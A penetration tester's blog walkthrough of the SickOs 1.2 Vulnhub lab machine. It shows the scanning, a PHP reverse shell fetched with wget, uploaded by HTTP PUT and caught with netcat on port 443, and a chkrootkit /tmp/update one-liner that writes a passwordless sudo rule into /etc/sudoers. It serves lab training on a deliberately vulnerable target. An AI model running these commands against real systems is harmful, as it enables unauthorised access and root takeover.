SickOs: 1.2 Vulnhub Machine Walkthrough

Today we are playing with SickOs 1.2 from Vulnhub.

Get the IP first.

nmap -sP 192.168.18.0/24

The IP address is 192.168.18.90.

Lets do a detailed scan now

root@kali:~# nmap 192.168.18.90 -A -O -sV -T5 -p- --script vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-11 04:22 EDT
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.18.90
Host is up (0.0010s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    lighttpd 1.4.28
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /test/: Test page
|_http-server-header: lighttpd/1.4.28
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:lighttpd:lighttpd:1.4.28: 
|       CVE-2013-4559   7.6     https://vulners.com/cve/CVE-2013-4559
|       CVE-2014-2323   7.5     https://vulners.com/cve/CVE-2014-2323
|       CVE-2013-4508   5.8     https://vulners.com/cve/CVE-2013-4508
|       CVE-2018-19052  5.0     https://vulners.com/cve/CVE-2018-19052
|       CVE-2014-2324   5.0     https://vulners.com/cve/CVE-2014-2324
|       CVE-2011-4362   5.0     https://vulners.com/cve/CVE-2011-4362
|_      CVE-2013-4560   2.6     https://vulners.com/cve/CVE-2013-4560
MAC Address: 08:00:27:65:6A:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.18, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.04 ms 192.168.18.90

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 173.84 seconds

We have nothing interesting in index.php.

but there is a page /test

Lets use CURL and check allowed HTTP Options.

curl -v -X OPTIONS http://192.168.18.90/test

Here PUT is allowed. Lets try uploading a php shell there.

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

Lets download this and PUT to the server.

wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -xzf php-reverse-shell-1.0.tar.gz

Edit the IP and PORT in the script.

Start a netcat listener in our machine

nc -nlvp 5555

and upload to server

curl --upload-file  shell.php -v --url http://192.168.18.90/test/shell.php -0 --http1.0

Now try to access this in the server.

WARNING: Failed to daemonise. This is quite common and not fatal. Connection timed out (110)

Looks like a problem with firewall. Lets try on port 443. Edit the file and re-upload to target.

We gota connection from the server. Great.

Lets now try to escalate privileges.

First get a TTY shell with the following command

python -c 'import pty;pty.spawn("/bin/bash")'

Lets have a look at the cron jobs.

ls -l /etc/cron.daily

There is a cron job with chkrootkit. We have a vulnerability for chkrootkit here.

https://www.exploit-db.com/exploits/33899

chkrootkit will run any executable placed as /tmp/update with root privileges.

Lets create the file.

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
chmod +x /tmp/update

Here our cron job runs daily. So we need to wait till next time the job runs. Use this command to check if the file is updated.

ls -la /etc/sudoers

After a few minutes the /etc/sudoers file got updated.

Now check our privileges.

We are root now. Lets find the flag.

SickOS v2 conquered! Next day next machine!

Melbin Mathew

I’m Melbin Mathew, Penetration Tester. Love learning something new every day. Drop a mail to connect.

LinkedIn | Github | Twitter

Contact: melbin [-at-] melbin.in

melbin.in

Related